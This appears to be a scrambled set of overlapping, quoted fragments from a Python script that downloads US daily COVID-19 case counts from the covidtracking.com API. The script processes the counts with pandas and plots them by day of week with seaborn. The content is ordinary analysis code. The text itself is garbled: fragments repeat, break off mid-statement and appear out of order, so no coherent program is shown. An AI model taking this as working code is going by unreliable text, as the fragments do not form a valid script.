"True else: return False def percent(num, denom): return 100 * num / denom", "module for processing data and creating visual summaries for this study. \"\"\" #", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot(", "field import *`). __all__ = [ 'DEBUG', ] # =========================================================================== # # IMPORTS", "style defaults. Set the default figure size. 
sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, )", "module is in the main module, call the main() function. if __name__ ==", "=', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean) / std", "*`). __all__ = [ 'DEBUG', ] # =========================================================================== # # IMPORTS # ===========================================================================", "Standard Library -- # import os # -- 3rd Party -- # import", "df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, rename_columns.__name__) #", "preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax =", "# Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return data frame for", "df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] =", "DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure()", "# # IMPORTS # =========================================================================== # # -- Python Standard Library -- #", "URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # ===========================================================================", "columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy", "df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] =", "DataFrame's index. df = df.set_index('date') # Add date-derived columns. 
df['date'] = df.index.date df['year']", "# Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) #", "-- Data Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download source", "data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, rename_columns.__name__)", "of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame. DEBUG", ") # Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame", "'../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' #", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame.", "pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as", "preview(df, add_columns.__name__) # Return data frame for reuse. return df def rename_columns(df: pd.DataFrame)", "df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, )", "# SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # #", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot(", "-- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as", "extract_data.__name__) # Return data frame for reuse. return df # -- Data Processing:", "-- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR =", "of Weekly Count of Cases') # Debug data frame. 
DEBUG and preview(df, summarize_by_dow_zscore.__name__)", "os # -- 3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot", "=========================================================================== # # EXPORTS # =========================================================================== # # Define the module's API --", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases')", "RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # ===========================================================================", "# def extract_data() -> pd.DataFrame: # Download source data as CSV from an", "print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x -", "= { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW =", "preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the default", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent", "= rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__)", "'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease',", "def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x,", "Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df =", "axis=1) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, )", "-- the list of exportable objects (classes, # functions, etc.) -- when performing", "this study. 
\"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__ =", "# DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative':", "'Saturday', ] # -- Debugging -- # DEBUG = True # -- Filesytem", "# # -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure()", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug", "as plt import pandas as pd import seaborn as sns # =========================================================================== #", "'Friday', 'Saturday', ] # -- Debugging -- # DEBUG = True # --", "ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame.", "Local Maxima of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) #", "index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return data", "-- Data Processing: Load -- # # -- Utilities -- # def lag_delta(series,", "def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame.", "# Return data frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame:", "rename_columns(df) df = add_columns(df) # Debug data frame. 
DEBUG and preview(df, transform_data.__name__) #", "[ 'DEBUG', ] # =========================================================================== # # IMPORTS # =========================================================================== # # --", "'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS", "__all__ = [ 'DEBUG', ] # =========================================================================== # # IMPORTS # =========================================================================== #", "data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig", "processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df,", "frame for reuse. return df # -- Data Processing: Load -- # #", "-- Utilities -- # def lag_delta(series, period): return series - series.shift(period) def lead_delta(series,", "'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG = True #", "the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame):", "preview(df, rename_columns.__name__) # Return data frame for reuse. return df # -- Data", "'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG = True", "= df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] =", "# Define the module's API -- the list of exportable objects (classes, #", "and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax", "ax.set_ylabel('Count of Cases') # Debug data frame. 
DEBUG and preview(df, summarize_by_dow.__name__) # plt.show()", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) #", "DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # --", "'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', }", "\"wild import\" (`from field import *`). __all__ = [ 'DEBUG', ] # ===========================================================================", "preview(df, transform_data.__name__) # Return data frame for reuse. return df def add_columns(df: pd.DataFrame):", "# Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the", "fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow',", "data and creating visual summaries for this study. \"\"\" # =========================================================================== # #", "__credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep", "defaults. Set the default figure size. 
sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def", "return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row):", "-- # def main(): df = extract_data() df = transform_data(df) visualize_data(df) # ===========================================================================", "data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, )", "copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame.", "plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the default figure", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of", "EXECUTION # =========================================================================== # # -- Main Program -- # # If this", "def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0", "functions, etc.) -- when performing a \"wild import\" (`from field import *`). __all__", "x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( {", "zScore(x, mean, std): return (x - mean) / std # -- Main Program", "= True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR =", "default figure size. 
sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig", "frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse. return df", "COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW", "data frame for reuse. return df # -- Data Processing: Transform -- #", "METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob)", "return True else: return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta']", "df # -- Data Processing: Extract -- # def extract_data() -> pd.DataFrame: #", "Load -- # # -- Utilities -- # def lag_delta(series, period): return series", ") df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease)", "Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data", "columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv',", "summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)])", "df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv',", "> 0: return True else: return False def percent(num, denom): return 100 *", "objects (classes, # functions, etc.) 
-- when performing a \"wild import\" (`from field", "# =========================================================================== # # -- Python Standard Library -- # import os #", "plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "# =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>']", "# # -- Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png')", "# =========================================================================== # # Define the module's API -- the list of exportable", "df = rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG and preview(df,", "local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else: return", "2020' # =========================================================================== # # EXPORTS # =========================================================================== # # Define the module's", "and preview(df, add_columns.__name__) # Return data frame for reuse. return df def rename_columns(df:", "# plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults():", "# -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df", "DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse. return df def", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of", "pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index. 
df = df.set_index('date')", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df,", "= plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 |", "frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults.", "import matplotlib.pyplot as plt import pandas as pd import seaborn as sns #", "data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse. return", "# Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) #", ") def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow',", "return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return", "= plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 |", "pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std):", "the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and", "# EXPORTS # =========================================================================== # # Define the module's API -- the list", "pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and", "-> pd.DataFrame: # Download source data as CSV from an API. df =", "=========================================================================== # # Define the module's API -- the list of exportable objects", "reuse. 
return df # -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame)", "df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index. df", "def percent(num, denom): return 100 * num / denom def preview(df: pd.DataFrame, func_name:", "DEBUG = True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR", "DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse. return df #", "# Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data.", "# __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ =", "for reuse. return df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date,", "summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW,", "# =========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>'", "summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "= transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== # #", "< 0: return True else: return False def local_min(row): if row['day1LagDelta'] < 0", "# IMPORTS # =========================================================================== # # -- Python Standard Library -- # import", "# Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for", "= df.index.dayofweek # Add group-summarization columns. 
df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum',", "pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed", "performing a \"wild import\" (`from field import *`). __all__ = [ 'DEBUG', ]", "study. \"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert", "'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday',", "-- # DEBUG = True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(),", "summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW,", "add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set the date", "of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__)", "if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else: return False", "ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020", "# Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1)", "Return data frame for reuse. return df def add_columns(df: pd.DataFrame): # Format date.", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data", "df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex']", "df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. 
df.rename(columns=COLUMNS, inplace=True) # Save", "WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease':", "= zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease,", "= '../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv'", "and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df)", "Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame):", "df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease,", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug", "2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # # EXPORTS # ===========================================================================", "DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse. return df #", "Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data", "SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # # --", "data frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse. 
return", "df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week',", "- mean) / std # -- Main Program -- # def main(): df", "the module's API -- the list of exportable objects (classes, # functions, etc.)", "frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig =", "(x - mean) / std # -- Main Program -- # def main():", "- series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta']", "# Download source data as CSV from an API. df = pd.read_csv(SOURCE_URL) #", "df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the processed", "# def main(): df = extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== #", "Main Program -- # # If this module is in the main module,", "plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year", "data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse. return", "Debug data frame. 
DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse.", "'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday',", "# =========================================================================== # # CONSTANTS # =========================================================================== # # -- Data -- #", "order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases')", "< 0 and row['day1LeadDelta'] > 0: return True else: return False def percent(num,", "marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases')", "def extract_data() -> pd.DataFrame: # Download source data as CSV from an API.", "of Week') ax.set_ylabel('Count of Local Maxima of Cases') # Debug data frame. DEBUG", "| Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week')", "transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== # # --", "sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "# =========================================================================== # # EXPORTS # =========================================================================== # # Define the module's API", "FUNCTIONS # =========================================================================== # # -- Data Analytics -- # def plot_series(df: pd.DataFrame):", "Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame.", "'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ]", "Cases') # Debug data frame. 
DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def", "df = df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year", "return True else: return False def percent(num, denom): return 100 * num /", "{func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean)", "1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min,", "Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add", "Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score", "-- Main Program -- # # If this module is in the main", "=========================================================================== # # -- Main Program -- # # If this module is", "(16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot(", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of", "= pd.to_datetime(df.date, format='%Y%m%d') # Set the date as the DataFrame's index. df =", "df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease']", "sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday',", "local extrema columns. 
df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save", "DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL =", "EXPORTS # =========================================================================== # # Define the module's API -- the list of", "reuse. return df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d')", "= os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs --", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date()", "0 and row['day1LeadDelta'] < 0: return True else: return False def local_min(row): if", "list of exportable objects (classes, # functions, etc.) -- when performing a \"wild", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases')", "-- Python Standard Library -- # import os # -- 3rd Party --", "date as the DataFrame's index. df = df.set_index('date') # Add date-derived columns. df['date']", "Utilities -- # def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period):", "/ denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5))", "visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG", "{ 'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [", "# # Define the module's API -- the list of exportable objects (classes,", "fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19", "source data as CSV from an API. 
df = pd.read_csv(SOURCE_URL) # Save a", "3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import", "Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show()", "data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "and preview(df, extract_data.__name__) # Return data frame for reuse. return df # --", "# Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) #", "# -- Data Processing: Load -- # # -- Utilities -- # def", "and preview(df, transform_data.__name__) # Return data frame for reuse. return df def add_columns(df:", "series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True", "data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig", "for processing data and creating visual summaries for this study. \"\"\" # ===========================================================================", "# If this module is in the main module, call the main() function.", "for reuse. return df # -- Data Processing: Load -- # # --", "main module for processing data and creating visual summaries for this study. \"\"\"", "df # -- Data Processing: Load -- # # -- Utilities -- #", "DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse. return df #", "= ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16,", "df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly =", "mean, std): return (x - mean) / std # -- Main Program --", "# Debug data frame. 
DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df:", "lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] =", "plt import pandas as pd import seaborn as sns # =========================================================================== # #", "of exportable objects (classes, # functions, etc.) -- when performing a \"wild import\"", "etc.) -- when performing a \"wild import\" (`from field import *`). __all__ =", "sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, )", "(`from field import *`). __all__ = [ 'DEBUG', ] # =========================================================================== # #", "return 100 * num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}():", "lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] =", "os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs -- #", "ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, 